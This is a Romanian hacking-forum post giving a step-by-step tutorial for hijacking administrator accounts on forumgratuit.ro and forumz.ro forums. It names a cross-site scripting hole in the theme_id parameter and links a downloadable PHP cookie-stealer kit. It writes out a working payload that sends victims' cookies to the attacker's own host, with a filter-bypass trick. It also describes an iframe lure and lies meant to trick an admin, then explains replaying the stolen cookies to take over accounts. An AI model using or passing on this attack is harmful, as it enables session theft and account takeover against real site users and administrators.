EliteHackers
SALUT 2022!!
NE-AM MUTAT PE DISCORD !
Vrei să inviți un prieten?
[T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r
Acesta aste link-ul oficial al acestui server.
|
Nou pe simpatie: Kalifa pe Simpatie
 | Femeie 24 ani Ialomita cauta Barbat 24 - 65 ani |
|
|
EliteHackersReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
r3vModerator
Postari: 1158
|
|
Asa dupa cum am promis am facut un mic cookie stealer pentru forumgratuit.ro, pentru inceput sa prezint si xss-ul pe care am tutorialul
xss: http://site.forumgratuit.ro/index.htm?theme_id=[xss]
Pentru a putea fura cookie avem nevoie de un xss il avem mai sus, un cookie stealer, o idee + minciuni credibile.
Micul stealer facut de mine introduce intr-o baza de date cookie-urile victimei, o sa uplaodez o arhiva unde o sa gasiti c.php,lista.php,config.php+baza de date
Download arhiva : http://www.multiupload.com/PAVC2CBTDP
Aveti nevoie subdomeniu unde sa uplaodati fiserele+acces la o baza de date, puteti face pe lx.ro sau orice alt subdomeniu doriti sau aveti la indemana.
Uploadati fisierele c.php,lista.php,config.php, iar fisierul cookie.sql il importati din phpmyadmin in baza voastra de date.In fisierul config.php va trebui sa modificati:
$bazadate="baza de date"; $username="username-ul"; $password="parola"; $host="hostname-ul";
Daca ati uploadat atunci urmeaza crearea url-ului cu xss cookie :
1.Sa zicem ca ati alex hi2.ro ca sa va uplaodati fisierele iar subdomeniul cu fisierele uplaodate este cookie.hi2.ro
2. iar cel de la care doriti fa furati cookie este : http://avemditati.forumz.ro/
3.xss-ul este aici :http://avemditati.forumz.ro/index.htm?theme_id= asa cum ati vazut si mai sus
4.acum trebuie sa punem graberul nostru pentru a fura cooki-ul :http://avemditati.forumz.ro/index.htm?theme_id="><script>document.location='http://cookie.hi2.ro/c.php?c='%2Bdocument.cookie</script>
Dupa cum cred ca ati observat am pus %2B in loc de + document.cookie din cauza ca simbolul '+' se filtra acesta este codul in hex al operatorului + iar % din fata specifica ca este urlencode si asa am scapat de filtrare.
Victima trebuie sa dea clik pe http://avemditati.forumz.ro/index.htm?t ... script> adica sa il execute in browser pentru ca noi sa avem cookie-urile lui, asta nu este o problema deoarece am putea folosi un iframe intr-o pagina de exemplu in indexul unui site punem <iframe>http://avemditati.forumz.ro/index.htm?theme_id="><script>document.location='http://cookie.hi2.ro/c.php?c='%2Bdocument.cookie</script></iframe> apoi mai scrie de exemplu boc sa impuscat etc sa fie o stire sau alte chestii salvam cu index.html uploadam undeva, dam link-ul prin pm unui admin si ii zicem este posibil asa ceva? sau orice va trece voua prin cap
dupa aceea laccesati cookie.hi2.ro/lista.php si o sa aveti tooate cookie-urile ca in imaginea de mai jos
cookie forumgratuit.ro
Ok ok avem cooke dar cum le folosim nu? ei bine aici este necesar un addon mozilla :https://addons.mozilla.org/en-US/firefox/addon/4510/
Dupa ce l-ati instalat treceti la modificarea de cookie, prima data vizitati site-ul tinta fara a face nimic pur si simplu il incarcati in browser de exemplu :http://avemditati.forumz.ro
Apoi merge-ti in Tools->Cookie Editor->add-> si completati cu datele din tabel pentru inceput cu linia 0 apoi debea linia 1 daca e cumva de la alt site prins
acum trecem la a doua coloana:
Din nou clik pe add si completam cu datele din a 2-coloana
Acum reintrat pe site si dati f5 la browser si o sa constatati ca daca userul prins era admin acum si dumneavoastra sunte-ti admin aveti acces la ce nu ar trebui
tutorial complet: http://r3vyk.info/?p=236
_______________________________________ http://thieves-team.com r3vyk.info mess id: doar prin PM datorita faptului ca mi-au dat add 10000 de retardati care joaca metin
|
|
| |
|